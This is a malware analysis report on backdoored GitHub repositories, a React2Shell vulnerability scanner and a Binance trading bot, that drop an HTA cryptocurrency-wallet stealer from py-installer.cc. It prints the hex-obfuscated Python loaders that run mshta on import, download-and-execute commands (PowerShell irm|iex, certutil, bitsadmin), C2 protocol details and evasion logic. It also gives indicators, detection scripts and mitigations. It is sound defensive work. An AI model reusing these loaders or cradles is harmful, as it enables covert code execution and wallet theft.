Date: December 9, 2025
Threat Type: Supply Chain Attack / Backdoor / Information Stealer / Cryptocurrency Wallet Stealer
Source Repository: https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py
Archive (niha0wa): https://web.archive.org/web/20251209081236/https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py
Archive (drak6y): https://web.archive.org/web/20251209101029/https://github.com/drak6y/Trading-Bot-For-Binance-Future
A legitimate CVE-2025-55182 (React Server Components RCE) vulnerability scanner has been compromised with a backdoor that automatically downloads and executes a sophisticated HTA (HTML Application) malware from https://py-installer.cc. This malware is a multi-stage dropper/loader that specifically targets cryptocurrency wallets, performs extensive system information gathering, and propagates via malicious shortcuts on removable drives.
The backdoor was introduced in the initial commit of the compromised repository:
Commit Details:
- Commit Hash: `1f3fedd01fea8a535573390bbae48d76a03b8585`
- Author: Kumar (`niharkuamr1122@gmail.com`)
- Date: Mon, 8 Dec 2025 17:24:09 +0200
- Subject: [PATCH] initial commit
This indicates that the repository was created with the backdoor already present from the first commit, suggesting the entire repository was malicious from its inception rather than being compromised later.
- niha0wa/React2shell-scanner: 36 stars, 18 forks
- drak6y/Trading-Bot-For-Binance-Future: 121 stars, 35 forks
- Total: 157 stars, 53 forks across both repositories
- Critical: Each star and fork represents a potential victim who may have cloned and executed the malicious code
- The high number of stars (especially 121 on the trading bot) indicates significant trust and widespread distribution
Author Investigation:
- No public information found for the email address `niharkuamr1122@gmail.com`
- The GitHub username `niha0wa` associated with the repository does not appear in public security research or malware analysis reports
- The name "Kumar" is common, making identification difficult without additional context
- The email address and identity are likely pseudonymous or fabricated for the purpose of distributing malware
- This pattern is consistent with threat actors using false identities to avoid attribution
Additional Infected Repositories:
drak6y/Trading-Bot-For-Binance-Future - Contains the exact same backdoor in `Logger.py`:
- Repository Created: November 24, 2025
- Initial Commit: November 25, 2025 16:17:16 UTC
- Author Email: `35601651+drak6y@users.noreply.github.com` (GitHub no-reply email)
- Author Name: "dank"
- ⚠️ Impact: 121 stars and 35 forks - Significant number of potential victims
- Archive.org Links: https://web.archive.org/web/20251209101029/https://github.com/drak6y/Trading-Bot-For-Binance-Future
- Function: `_setup_environment()` (identical functionality to `_initialize_runtime_environment()`, only the function name differs)
- Backdoor Code:

```python
import os
import subprocess

_initialized = False  # module-level guard in Logger.py (not shown in the excerpt) so the loader runs only once


def _setup_environment():
    global _initialized
    if _initialized:
        return
    _initialized = True
    try:
        # strings are hex-encoded so 'mshta' and the C2 domain never appear in plain text
        _h1 = bytes.fromhex('6d73687461')                  # 'mshta'
        _h2 = bytes.fromhex('2e657865')                    # '.exe'
        _h3 = bytes.fromhex('68747470733a2f2f')            # 'https://'
        _h4 = bytes.fromhex('70792d696e7374616c6c65722e')  # 'py-installer.'
        _h5 = bytes.fromhex('6363')                        # 'cc'
        _cmd = (_h1 + _h2).decode('utf-8')                 # 'mshta.exe'
        _url = (_h3 + _h4 + _h5).decode('utf-8')           # 'https://py-installer.cc'
        if os.name == 'nt':  # Windows only
            subprocess.Popen([_cmd, _url], shell=True,
                             stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    except:
        pass  # any failure is swallowed silently
```

- Same hex-encoded strings: Identical encoding pattern as niha0wa/React2shell-scanner
- Same execution pattern: `subprocess.Popen([cmd, url], shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)`
- Timeline: The backdoor was present from the initial commit, confirming the repository was created maliciously from the start
- Note: Different email from niha0wa/React2shell-scanner (`niharkuamr1122@gmail.com`), but identical backdoor code confirms a coordinated distribution campaign by the same threat actor or group
The compromised scanner contains a malicious function _initialize_runtime_environment() that executes automatically upon import:
```python
def _initialize_runtime_environment():
    import subprocess as _sp
    # 'mshta' + '.exe', hex-encoded to keep the LOLBin name out of the plain source
    _exec_path = bytes.fromhex('6d73687461').decode('utf-8') + bytes.fromhex('2e657865').decode('utf-8')
    # 'https://' + 'py-installer.cc', the C2 that serves the HTA
    _remote_endpoint = bytes.fromhex('68747470733a2f2f').decode('utf-8') + bytes.fromhex('70792d696e7374616c6c65722e6363').decode('utf-8')
    _runtime_args = [_exec_path, _remote_endpoint]
    try:
        # output discarded and no console window (0x08000000 = CREATE_NO_WINDOW)
        _sp.Popen(_runtime_args, shell=True, stdout=_sp.DEVNULL, stderr=_sp.DEVNULL,
                  creationflags=0x08000000 if hasattr(_sp, 'CREATE_NO_WINDOW') else 0)
    except:
        pass  # fail silently


_initialize_runtime_environment()  # called at module level, so importing the scanner is enough
```

Decoded Values:
- `6d73687461` (hex) → `mshta` (ASCII)
- `2e657865` (hex) → `.exe` (ASCII)
- `68747470733a2f2f` (hex) → `https://` (ASCII)
- `70792d696e7374616c6c65722e6363` (hex) → `py-installer.cc` (ASCII)
Execution Command:
`mshta.exe https://py-installer.cc`
Stealth Mechanisms:
- `stdout=_sp.DEVNULL` - Suppresses standard output
- `stderr=_sp.DEVNULL` - Suppresses error output
- `creationflags=0x08000000` (CREATE_NO_WINDOW) - Executes without a visible window
- Silent exception handling - No error messages displayed
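Because both variants hide `mshta.exe` and the C2 domain behind `bytes.fromhex()` literals, a plain string grep for the indicators misses them. The following static triage script is an added example (not code from the report or either repository): it walks a Python source with `ast`, decodes every `bytes.fromhex('...')` literal, and joins the fragments in source order so split indicators such as `'py-installer.'` + `'cc'` are still caught. The `SAMPLE` source is constructed to mirror the `_setup_environment()` structure.

```python
"""Static triage for hex-encoded LOLBin strings in Python sources (added example)."""
import ast

# indicator substrings taken from this report; extend for other LOLBins as needed
SUSPICIOUS = ("mshta", "py-installer.cc", "powershell", "certutil", "bitsadmin", "rundll32")

# constructed sample mirroring the backdoor's structure (not the real Logger.py)
SAMPLE = '''
import os, subprocess
def _setup_environment():
    _h1 = bytes.fromhex('6d73687461')
    _h2 = bytes.fromhex('2e657865')
    _h3 = bytes.fromhex('68747470733a2f2f')
    _h4 = bytes.fromhex('70792d696e7374616c6c65722e')
    _h5 = bytes.fromhex('6363')
    _cmd = (_h1 + _h2).decode('utf-8')
    _url = (_h3 + _h4 + _h5).decode('utf-8')
    if os.name == 'nt':
        subprocess.Popen([_cmd, _url], shell=True)
'''


def _is_fromhex(node):
    """True for a call of the exact shape bytes.fromhex('<string literal>')."""
    return (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
            and node.func.attr == "fromhex" and isinstance(node.func.value, ast.Name)
            and node.func.value.id == "bytes" and len(node.args) == 1
            and isinstance(node.args[0], ast.Constant) and isinstance(node.args[0].value, str))


def decode_fromhex_literals(source):
    """Return {line_number: decoded_text} for every bytes.fromhex() literal in `source`.
    Nested forms such as bytes.fromhex('..').decode('utf-8') are found too, because
    ast.walk visits the inner Call node."""
    decoded = {}
    for node in ast.walk(ast.parse(source)):
        if _is_fromhex(node):
            try:
                decoded[node.lineno] = bytes.fromhex(node.args[0].value).decode("utf-8", "replace")
            except ValueError:
                continue  # not valid hex: not the pattern we are after
    return decoded


def find_hex_obfuscated_indicators(source):
    """Decode all fromhex literals, concatenate them in source order, and report
    which known indicators appear in the joined text. Returns (decoded, hits)."""
    decoded = decode_fromhex_literals(source)
    joined = "".join(decoded[k] for k in sorted(decoded))
    hits = sorted({ind for ind in SUSPICIOUS if ind in joined})
    return decoded, hits


if __name__ == "__main__":
    found, indicators = find_hex_obfuscated_indicators(SAMPLE)
    for lineno, text in sorted(found.items()):
        print(f"line {lineno}: {text!r}")
    print("indicators:", indicators)
```

Run it over every `.py` file of a freshly cloned tool before importing anything; any hit on `mshta` or a C2 domain inside hex literals is a strong signal even when the function name differs from the two variants documented here.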
The backdoor is embedded in a legitimate security tool, increasing the likelihood of execution by:
- Security researchers testing CVE-2025-55182
- System administrators scanning for vulnerabilities
- Security teams performing assessments
The scanner appears fully functional, masking the presence of the backdoor.
The C2 server py-installer.cc implements User-Agent filtering:
- Blocked: Standard curl/requests (HTTP 400)
- Allowed: MSIE User-Agent (HTTP 200, serves malware)
This blocks casual automated fetching of the payload while still serving it to the MSIE-style requests the malware itself makes.
File Type: HTML Application (HTA)
File Size: 88,686 bytes (~87 KB)
SHA256: 915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
MD5: 635dd3d016c76f5c0329d3fcfd3c2005
VirusTotal: https://www.virustotal.com/gui/file/915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
Obfuscation Method: XOR cipher with key 112
Obfuscation Level: High (all strings encoded)
C2 Server: https://py-installer.cc
C2 Protection: Cloudflare with User-Agent filtering
Certificate: Valid SSL certificate (Google Trust Services, expires Feb 21, 2026)
The malware uses a _stateProxy function that decrypts strings on-demand:
```javascript
var _stateProxy = function () {
    var key = 112;
    // every string used by the HTA is stored as an array of XOR-encoded char codes
    var executeModule = [[2, 21, 17, 3, 31, 30], [26, 7, 4], ...];
    return function (index) {
        var dataService = executeModule[index];
        if (!dataService) return '';
        var result = "";
        for (var sendWorker = 0; sendWorker < dataService.length; sendWorker++) {
            result += String.fromCharCode(dataService[sendWorker] ^ key);
        }
        return result;
    };
}();
```

Decryption Process:
- Retrieve the array at index `i` from `executeModule`
- XOR each byte with the key `112`
- Convert each result to a character and concatenate
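The string table can be recovered offline without running the HTA. The decoder below is an added example (not part of the report): it pulls the `executeModule` literal out of the HTA source with a regular expression and applies the same `c ^ 112` transform the `_stateProxy` closure performs at runtime. `HTA_EXCERPT` is a constructed fragment containing only the two arrays quoted above.

```python
"""Offline decoder for the _stateProxy XOR string table (added example)."""
import re

XOR_KEY = 112  # from `var key = 112;` in the sample

# constructed excerpt; only the two arrays shown in the report are included
HTA_EXCERPT = r"""
var _stateProxy = function () {
    var key = 112;
    var executeModule = [[2, 21, 17, 3, 31, 30], [26, 7, 4]];
    return function (index) { /* ... */ };
}();
"""


def decode_entry(codes, key=XOR_KEY):
    """XOR each char code with the key, exactly like String.fromCharCode(c ^ key)."""
    return "".join(chr(c ^ key) for c in codes)


def extract_string_table(hta_source):
    """Locate `executeModule = [[...], [...]]` and return it as a list of int lists.
    Whitespace and newlines inside the literal are tolerated; returns [] if absent."""
    m = re.search(r"executeModule\s*=\s*(\[\s*\[[\d,\s\[\]]*\])", hta_source)
    if not m:
        return []
    table = []
    for inner in re.findall(r"\[([\d,\s]*)\]", m.group(1)):
        nums = [int(n) for n in inner.split(",") if n.strip()]
        if nums:
            table.append(nums)
    return table


def decode_string_table(hta_source, key=XOR_KEY):
    """Return {index: plaintext}, so a call like _stateProxy(1) can be resolved by index."""
    return {i: decode_entry(codes, key)
            for i, codes in enumerate(extract_string_table(hta_source))}


if __name__ == "__main__":
    for idx, text in decode_string_table(HTA_EXCERPT).items():
        print(f"_stateProxy({idx}) -> {text!r}")
```

Against the real sample the same function yields the full decoded_strings.txt list; the two arrays quoted in the report decode to `reason` and `jwt`.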
Primary C2:
- `https://py-installer.cc` (172.67.219.119, 104.21.53.225)
C2 Endpoints:
- `connect?hwid=` - Initial connection with hardware ID
- `getModule?name=` - Download additional modules
- `getPsModule@` - PowerShell module download
- `approveUpdate?id=` - Update approval mechanism
- `checkStatus` - Status check endpoint
Communication Protocol:
- Method: HTTP POST
- Authentication: JWT (JSON Web Token) via the `Authorization: Bearer` header
- Parameters: `hwid`, `os`, `av`, `username`, `corp`, `domain`, `version`, `key`, `ledger`, `wallets`, `task`
WMI Queries Executed:
- `SELECT ProcessorId FROM Win32_Processor` - CPU identifier
- `SELECT UUID FROM Win32_ComputerSystemProduct` - System UUID
- `SELECT SerialNumber FROM Win32_DiskDrive` - Disk serial numbers
- `SELECT Model FROM Win32_DiskDrive` - Disk model information
- `SELECT Caption, Version, ProductType FROM Win32_OperatingSystem` - OS details
- `SELECT displayName FROM AntiVirusProduct` - Installed antivirus
- `SELECT PartOfDomain FROM Win32_ComputerSystem` - Domain membership
- `SELECT Domain, PartOfDomain FROM Win32_ComputerSystem` - Domain information
- `SELECT Name FROM Win32_Process` - Running processes
Information Collected:
- Hardware identifiers (ProcessorId, UUID, SerialNumber, Model)
- Operating system version and architecture
- Domain membership status
- Installed antivirus products
- Username and computer name
- Environment variables (PROCESSOR_ARCHITECTURE, PROCESSOR_ARCHITEW6432)
The malware specifically targets the following wallet applications:
- Ledger Live
  - Paths: `%ProgramFiles%\Ledger Live`, `%ProgramFiles(x86)%\Ledger Live`, `%ProgramFiles%\Programs\ledger-live`
  - Detection: Searches for Ledger installation directories
- Trezor
  - Path: `%APPDATA%\@trezor`
- Atomic Wallet
  - Path: `%APPDATA%\atomic`
- Exodus
  - Path: `%APPDATA%\Exodus`
- Guarda
  - Path: `%APPDATA%\Guarda`
- KeepKey
  - Path: `%APPDATA%\KeepKey`
- BitBox02
  - Path: `%APPDATA%\BitBox02`
Wallet Data Exfiltration:
- Scans for wallet installation directories
- Collects wallet-related information
- Sends wallet detection status to C2 via the `&ledger=` and `&wallets=` parameters
The malware uses multiple methods to download and execute payloads:
- PowerShell: `powershell.exe -ep Bypass -nop -Command "irm <URL> | iex"`
  - Bypasses execution policy
  - Downloads and executes in memory
- BITS (Background Intelligent Transfer Service): `bitsadmin.exe /transfer "<task>" /download /priority foreground "<URL>" "<path>"`
  - Uses the Windows built-in download service
  - Less likely to be blocked by security tools
- Certutil: `certutil.exe -urlcache -split -f "<URL>" "<path>"`
  - Abuses a legitimate Windows utility
  - Often whitelisted by security tools
- MSXML2.XMLHTTP + ADODB.Stream:

  ```vbscript
  Set http = CreateObject("MSXML2.XMLHTTP")
  http.Open "GET", url, False
  http.Send
  Set stm = CreateObject("ADODB.Stream")
  stm.Type = 1 ' binary
  stm.Write http.responseBody
  stm.SaveToFile path, 2
  ```

  - Native Windows COM objects
  - No external dependencies
- Rundll32: `rundll32 "<dll_path>",<entry_point>`
  - Executes DLL payloads
USB Propagation:
- Enumerates removable drives via WMI: `SELECT DeviceID,DriveType FROM Win32_LogicalDisk WHERE DriveType=2`
  - DriveType 2 = Removable drive
- Scans for target file types:
  - `.docx` (Microsoft Word documents)
  - `.pdf` (PDF documents)
  - `.doc` (Legacy Word documents)
- Creates malicious shortcuts:
  - Replaces original files with `.lnk` shortcuts
  - Shortcut target: `mshta.exe https://py-installer.cc`
  - Icon: Extracted from the original file or system default
  - Hidden attribute set on the original file
- Shortcut creation code: `start "" ".\<filename>" & start "" mshta "<C2_URL>"`
Persistence:
- Uses Windows Task Scheduler (`Schedule.Service`)
- Task names: `NVIDIA App SelfUpdate_<HWID>`
- Intervals: `PT30M` (30 minutes), `PT10M` (10 minutes), `P3650D` (10 years)
- Username Detection:
  - Checks for: `AZURE-PC`, `Bruno`
  - If detected, exits immediately (common sandbox usernames)
- System Account Detection:
  - Checks for: `SYSTEM`, `СИСТЕМА` (Russian)
  - Different behavior for system accounts
- Antivirus Detection:
  - Detects: `Falcon`, `csfalconservice` (CrowdStrike Falcon)
  - Adjusts behavior based on AV presence
- Environment Checks:
  - Verifies `PROCESSOR_ARCHITECTURE` and `PROCESSOR_ARCHITEW6432`
  - Checks domain membership
  - Validates system configuration
- Timing Delays:
  - Implements delays between operations
  - Prevents rapid automated analysis
The malware implements a task-based execution system:
Task Types:
- Type 1: Download and execute via HTTP
- Type 2: Download and execute module
- Type 3: Download file
- Type 4: Delete scheduled task
- Type 5: Execute JavaScript code
- Type 6: Parse and execute parameters
- Type 9: Validate request (USB propagation)
- Type 10: Execute command
- Type 11: Execute PowerShell command
Task Flow:
- Connect to C2 with HWID
- Receive task list (JSON format)
- Execute tasks sequentially
- Report completion status
- Download additional modules if needed
The malware generates a unique hardware identifier (HWID) using:
Components:
- ProcessorId (from WMI)
- UUID (from WMI)
- SerialNumber (from WMI)
- Model (from WMI)
- Username
- System information
Process:
- Concatenate hardware identifiers
- Hash using MD5 algorithm
- Format as UUID: `{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}`
- Use as unique identifier for C2 communication
Main Functions:
- `payload()` - Main entry point
  - Performs sandbox checks
  - Collects system information
  - Connects to C2
  - Executes tasks
- `parseRequest()` - System info collection
  - Gets computer name and username
  - Returns format: `COMPUTER\USERNAME`
- `initResponse()` - OS detection
  - Determines Windows version
  - Detects architecture (x86/x64)
  - Returns formatted OS string
- `payloadManager()` - Antivirus detection
  - Queries WMI for installed AV
  - Returns comma-separated list
- `setInstance()` - Hardware fingerprinting
  - Collects ProcessorId, UUID, SerialNumber, Model
  - Generates unique identifier
- `loadModule(url)` - Module downloader
  - Downloads ZIP files
  - Extracts to temp directory
  - Executes payload
- `validateRequest(setData)` - USB propagation
  - Scans removable drives
  - Creates malicious shortcuts
  - Returns success status
- `itemPromise(buildModule)` - C2 communication
  - Sends HTTP POST requests
  - Handles authentication
  - Returns task data
C2 Domain:
- `py-installer.cc`
- IP Addresses: `172.67.219.119`, `104.21.53.225` (Cloudflare)
- IPv6: `2606:4700:3033::6815:35e1`, `2606:4700:3034::ac43:db77`
C2 Endpoints:
- `https://py-installer.cc/`
- `https://py-installer.cc/connect?hwid=...`
- `https://py-installer.cc/getModule?name=...`
- `https://py-installer.cc/getPsModule@...`
- `https://py-installer.cc/approveUpdate?id=...`
- `https://py-installer.cc/checkStatus`
HTTP Headers:
- User-Agent: `Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0)`
- Content-Type: `application/hta` (malware delivery)
- Content-Disposition: `attachment; filename=Python2.hta`
Request Parameters:
- `hwid` - Hardware identifier
- `os` - Operating system
- `av` - Antivirus products
- `username` - Username
- `corp` - Corporate information
- `domain` - Domain name
- `version` - OS version
- `key` - Encryption key
- `ledger` - Ledger wallet detection
- `wallets` - Other wallet detection
- `task` - Task identifier
Malware Files:
- `Python2.hta` - Primary malware (downloaded name)
- MalShare: https://malshare.com/sample.php?action=detail&hash=915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
File Locations:
- `%userprofile%\` - User profile directory
- `%LOCALAPPDATA%\` - Local application data
- `%APPDATA%\` - Application data
- Removable drives - USB propagation
File Extensions Targeted:
- `.docx` - Microsoft Word documents
- `.pdf` - PDF documents
- `.doc` - Legacy Word documents
Processes:
- `mshta.exe https://py-installer.cc` - Initial execution
- `powershell.exe -ep Bypass -nop -Command "irm ... | iex"` - PowerShell execution
- `bitsadmin.exe /transfer` - BITS downloader
- `certutil.exe -urlcache -split -f` - Certutil downloader
- `rundll32.exe` - DLL execution
Scheduled Tasks:
- Task name pattern: `NVIDIA App SelfUpdate_<HWID>`
- Intervals: 30 minutes, 10 minutes, or 10 years
Registry Keys:
- `HKEY_CLASSES_ROOT\<extension>\DefaultIcon\` - File association icons
  - Used for shortcut icon extraction
WMI Queries:
- Multiple `SELECT` queries against `root\cimv2`
- Queries for hardware information
- Antivirus product enumeration
- Process enumeration
Network Activity:
- HTTP POST requests to `py-installer.cc`
- JWT authentication tokens
- JSON payloads with system information
File System Activity:
- Creation of `.lnk` files on removable drives
- Setting hidden attributes on original files
- Extraction of ZIP files to temp directories
Signatures:
- HTTP requests to `py-installer.cc` with MSIE User-Agent
- POST requests with parameters: `hwid`, `os`, `av`, `username`, etc.
- JWT tokens in the `Authorization: Bearer` header
- Content-Type: `application/hta`
DNS Monitoring:
- Queries for `py-installer.cc`
- Block at DNS level
Firewall Rules:
- Block outbound connections to `py-installer.cc`
- Block IP addresses: `172.67.219.119`, `104.21.53.225`
Process Monitoring:
- Alert on `mshta.exe` execution with remote URLs
- Monitor for `powershell.exe -ep Bypass`
- Alert on `bitsadmin.exe /transfer` to external domains
- Monitor `certutil.exe -urlcache` usage
File System Monitoring:
- Alert on creation of `.lnk` files on removable drives
- Monitor for hidden file attribute changes
- Alert on extraction of ZIP files in temp directories
WMI Monitoring:
- Alert on excessive WMI queries for hardware information
- Monitor for queries: `Win32_Processor`, `Win32_ComputerSystemProduct`, `Win32_DiskDrive`
Scheduled Task Monitoring:
- Alert on creation of tasks with name pattern: `NVIDIA App SelfUpdate_*`
- Monitor for tasks with long intervals (10 years)
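The process and scheduled-task checks above translate directly into triage logic. The script below is an added example (not one of the repository's Sigma rules): it applies those checks to constructed Sysmon-style `image|commandline` events and reports which detection each line triggers, so a benign local `mshta.exe` run or an ordinary `git clone` stays unflagged while the loader chain documented here does not. The `schtasks` line and the `example.invalid` hosts are constructed sample values.

```python
"""Process-creation triage for the py-installer.cc loader chain (added example)."""
import re

C2_DOMAIN = "py-installer.cc"
REMOTE_URL = re.compile(r"https?://", re.I)

# constructed sample events (not real telemetry), one 'image|commandline' per line
SAMPLE_EVENTS = """\
C:\\Windows\\System32\\mshta.exe|mshta.exe https://py-installer.cc
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -ep Bypass -nop -Command "irm https://example.invalid/x | iex"
C:\\Windows\\System32\\bitsadmin.exe|bitsadmin.exe /transfer "job" /download /priority foreground "https://example.invalid/p" "C:\\Users\\u\\AppData\\Local\\p.dat"
C:\\Windows\\System32\\certutil.exe|certutil.exe -urlcache -split -f "https://example.invalid/p" "C:\\Users\\u\\AppData\\Local\\p.dat"
C:\\Windows\\System32\\schtasks.exe|schtasks.exe /create /tn "NVIDIA App SelfUpdate_{0A1B2C3D-0000-0000-0000-000000000000}" /sc minute /mo 30 /tr mshta.exe
C:\\Windows\\System32\\mshta.exe|mshta.exe C:\\Users\\u\\local.hta
C:\\Program Files\\Git\\cmd\\git.exe|git clone https://github.com/example/repo
"""


def _lower_basename(image):
    """'C:\\Windows\\System32\\mshta.exe' -> 'mshta.exe'."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(image, cmdline):
    """Return the list of detection names an event triggers (empty list = not flagged)."""
    exe, cl = _lower_basename(image), cmdline.lower()
    hits = []
    if exe == "mshta.exe" and REMOTE_URL.search(cmdline):
        hits.append("mshta_remote_url")            # mshta.exe with a remote URL
    if exe == "powershell.exe" and re.search(r"-e(xecutionpolicy|p)\s+bypass", cl):
        hits.append("powershell_ep_bypass")        # -ep Bypass
        if "irm" in cl and "iex" in cl:
            hits.append("powershell_download_cradle")  # irm <URL> | iex
    if exe == "bitsadmin.exe" and "/transfer" in cl and REMOTE_URL.search(cmdline):
        hits.append("bitsadmin_remote_transfer")   # BITS download from external host
    if exe == "certutil.exe" and "-urlcache" in cl:
        hits.append("certutil_urlcache")           # certutil used as a downloader
    if "nvidia app selfupdate_" in cl:
        hits.append("scheduled_task_name_pattern")  # NVIDIA App SelfUpdate_<HWID>
    if C2_DOMAIN in cl:
        hits.append("known_c2_domain")             # direct reference to the C2
    return hits


def triage(events_text):
    """Parse 'image|commandline' lines; return [(line_no, hits)] for flagged lines only."""
    flagged = []
    for n, line in enumerate(events_text.splitlines(), 1):
        if "|" not in line:
            continue
        image, cmdline = line.split("|", 1)
        hits = classify_event(image, cmdline)
        if hits:
            flagged.append((n, hits))
    return flagged


if __name__ == "__main__":
    for line_no, hits in triage(SAMPLE_EVENTS):
        print(f"line {line_no}: {', '.join(hits)}")
```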
Detection rules are available in the rules/ directory:
YARA rules:
- `rules/react2shell_backdoor.yar` - Detects React2Shell scanner backdoor in Python files
- `rules/hta_malware_pyinstaller.yar` - Detects HTA malware from py-installer.cc C2 server
Usage:
```bash
yara rules/react2shell_backdoor.yar <file>
yara rules/hta_malware_pyinstaller.yar <file>
```
Sigma rules:
- `rules/sigma_react2shell_backdoor.yml` - Detects mshta.exe execution with py-installer.cc
- `rules/sigma_react2shell_c2_network.yml` - Detects network connections to C2 infrastructure
- `rules/sigma_react2shell_c2_endpoints.yml` - Detects HTTP requests to C2 endpoints
- `rules/sigma_react2shell_scheduled_task.yml` - Detects suspicious scheduled task creation
- `rules/sigma_react2shell_python_backdoor.yml` - Detects Python backdoor function execution
- `rules/sigma_react2shell_wmi_persistence.yml` - Detects WMI event subscription persistence
Usage:
```bash
# Convert to SIEM format (example with sigmac)
sigmac -t splunk rules/sigma_react2shell_backdoor.yml
sigmac -t elastic rules/sigma_react2shell_c2_network.yml
```
- Immediate Actions:
  - Block `py-installer.cc` at DNS/firewall level
  - Scan for `mshta.exe` processes with remote URLs
  - Check removable drives for malicious shortcuts
  - Review scheduled tasks for suspicious entries
- Wallet Protection:
  - Use hardware wallets with additional security
  - Do not connect wallets to potentially compromised systems
  - Use dedicated systems for cryptocurrency operations
  - Enable additional wallet security features (passphrases, etc.)
- Tool Verification:
  - Verify integrity of security tools before use
  - Use official sources and verify checksums
  - Review source code for suspicious functions
  - Use isolated environments for testing
- System Hardening:
  - Disable HTA execution via Group Policy
  - Restrict WMI access
  - Monitor for unusual network connections
  - Implement application whitelisting
- User Education:
  - Warn about supply chain attacks
  - Educate on verifying tool integrity
  - Train on identifying suspicious behavior
Overall Risk: CRITICAL
- Cryptocurrency Theft:
  - Direct targeting of wallet applications
  - Potential for complete wallet compromise
  - Financial loss for affected users
- Data Exfiltration:
  - Collection of sensitive system information
  - Hardware fingerprinting
  - Domain and corporate information leakage
- Lateral Movement:
  - USB propagation enables network-wide infection
  - Potential for APT-level persistence
  - Long-term access to compromised systems
- Reputation Damage:
  - Compromise of security tools damages trust
  - Potential for widespread distribution
  - Impact on the security research community
- Security researchers
- System administrators
- Cryptocurrency wallet users
- Organizations using Windows systems
- Users of removable media (USB drives)
This attack demonstrates:
- High technical sophistication: Advanced obfuscation, multiple execution methods
- Social engineering: Use of legitimate security tool
- Targeted approach: Specific focus on cryptocurrency wallets
- Persistence mechanisms: Long-term access via scheduled tasks
- Evasion techniques: Sandbox detection, AV evasion
The compromise of a security tool represents a supply chain attack:
- Targets security-conscious users
- High trust in security tools
- Likely to be executed in privileged contexts
- Difficult to detect without code review
The malware leverages interest in CVE-2025-55182:
- Security researchers actively scanning for this vulnerability
- High likelihood of tool execution
- Targets security-aware individuals
- Potential for widespread distribution
- Always review source code before execution
- Verify checksums and signatures
- Use isolated environments for testing
- Monitor for unexpected network connections
- Report suspicious tools to security communities
- Implement network monitoring for C2 communications
- Block known malicious domains
- Monitor for HTA execution
- Restrict WMI access where possible
- Implement USB device control policies
- Use application whitelisting
- Monitor scheduled task creation
- Use hardware wallets exclusively
- Never connect wallets to untrusted systems
- Use dedicated systems for crypto operations
- Enable all available security features
- Monitor wallet applications for suspicious activity
This malware represents a sophisticated, multi-stage threat that combines:
- Supply chain attack: Compromised legitimate security tool
- Advanced obfuscation: XOR-encrypted strings, complex JavaScript
- Targeted theft: Specific focus on cryptocurrency wallets
- Propagation: USB-based spreading mechanism
- Persistence: Long-term access via scheduled tasks
- Evasion: Multiple sandbox and AV detection techniques
The compromise of a security tool demonstrates the importance of:
- Verifying tool integrity before use
- Using isolated environments for testing
- Monitoring for unexpected behavior
- Implementing defense-in-depth strategies
- Source Repository: https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py
- Archive: https://web.archive.org/web/20251209081236/https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py
- CVE-2025-55182: React Server Components Remote Code Execution
- C2 Infrastructure: https://py-installer.cc
- Malware Sample: https://malshare.com/sample.php?action=detail&hash=915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
- VirusTotal: https://www.virustotal.com/gui/file/915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
See decoded_strings.txt for the complete list of decrypted strings from the malware.
- HTA Malware Sample: https://malshare.com/sample.php?action=detail&hash=915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03 (88,686 bytes)
- Source Repository: https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py (compromised scanner)
The malware communicates via HTTP POST requests with the following structure:
```text
POST https://py-installer.cc/connect?hwid={HWID}
Headers:
  Authorization: Bearer {JWT_TOKEN}
  Content-Type: application/json
Body:
  {
    "hwid": "...",
    "os": "...",
    "av": "...",
    "username": "...",
    "corp": "...",
    "domain": "...",
    "version": "...",
    "key": "...",
    "ledger": "...",
    "wallets": "...",
    "task": "..."
  }
```
Report Generated: December 9, 2025
Analyst: Chocapikk
Classification: UNCLASSIFIED